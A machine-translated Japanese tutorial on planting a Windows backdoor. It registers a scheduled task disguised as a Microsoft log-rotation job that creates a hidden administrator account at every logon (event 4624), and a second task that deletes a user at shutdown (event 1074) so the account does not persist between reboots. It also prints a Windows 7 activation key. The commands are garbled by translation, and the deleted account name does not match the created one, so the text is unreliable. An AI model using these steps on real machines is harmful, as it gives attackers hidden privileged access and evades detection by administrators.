まず、タスクが必要です
スタートアップを設計するには、シャットダウンイベントは、達成するためのタスクトリガー条件を予定し:
1、新しいユーザー・ブート
2、シャットダウン時にユーザーを削除
第二に、解決手順
(A)のテスト環境を構築します
コマンド・イベントがトリガされ Schtasksのを。
使用でschtasksをトリガーするログイベントの使用を決定するために:主な機能である完了するために、ネットユーザーの新しい管理者アカウントを達成するためにコマンドを、。
従来使用している場合で、イベントログによってトリガすることができないすべての最初の、コマンドを、複数のコマンドラインを実行する必要が続き、彼らだけに書き込むことができるの.bat バッチファイルの処理。
イベントトリガを使用しているため、 XPは新しい作成するので、この機能を持っていませんwin7の仮想マシンを。
Win7のためのアクティベーションキーYKHFT KW986 GK4PY FDWYH 7TP9F
(B)ユーザーを作成するための電源
Schtasksの使用法の説明:
これは、管理者が作成することができ、削除、クエリ、変更、ローカルまたはリモートシステム上の任意の計画を実行し、一時停止します
サービス。
パラメータリスト:
作成/ 新しいスケジュールされたタスクを作成します。
/削除 スケジュールされたタスクを削除します。
/クエリは 、すべてのスケジュールされたタスクが表示されます。
/変更は、 スケジュールされたタスクのプロパティを変更します。
/実行 需要スケジュールされたタスクで実行されます。
/終了は 、現在実行されているスケジュールされたタスクを中止します。
/ ShowSid 適切なセキュリティ識別子を計画のタスクの名前を表示します。
/? このヘルプメッセージを表示します。
例:
SCHTASKS
SCHTASKS /?
SCHTASKS /実行/?
SCHTASKS /終了/?
SCHTASKS / /作成しますか?
SCHTASKS / /削除しますか?
SCHTASKS /クエリ/?
SCHTASKS /変更/?
SCHTASKS / ShowSid /?
イベントブートイベント IDがある4624 、そのコードは以下の通りであります:
でschtasks / / TNを作成する "マイクロソフト\ Windowsの\ LocalEventLogRotate" / TR "\" のcmd.exe \」/ kのネットユーザーcyx cyx /追加/ Y /アクティブ:はい>> NUL&ネットLOCALGROUP管理者cyx /追加> NUL&ネットユーザーcyx /コメント:\ "ビルトインアカウントネットワーク吸盤をBackdooringため\"> NUL&終了 "/ F / RUシステム/ ECセキュリティ/ SCのonEvent / MO" * [システム[プロバイダー[@名= 'マイクロソフトのWindows - セキュリティ監査 ']とイベントID = 4624]]」
このコード行は、コマンドラインウィンドウで直接入力することができます。
アカウントが削除されていないときにシャットダウンするので、窓がログインしたときに再起動します。
(C)オフ削除ユーザ
問い合わせシャットダウンイベントの際に ID である1074 。
コードは以下の通りであります:
でschtasks / / TNを作成する "マイクロソフト\ Windowsの\ LocalEventLog" / TR "\" cmd.exeを\ "/ kのネットユーザーレモン/デル> NUL&終了" / F / RUシステム/ SCのonEvent / ECシステム/ MO「* [システム[イベントID = 1074]]」
まずアカウントをシャットダウンする前に、状況をご確認ください
再起動後、以下のような結果として、アカウントが削除されています。
オンにすると、その後、入力 NETにユーザーを成功スタートアップが確立された後、アカウントを見ることができます。
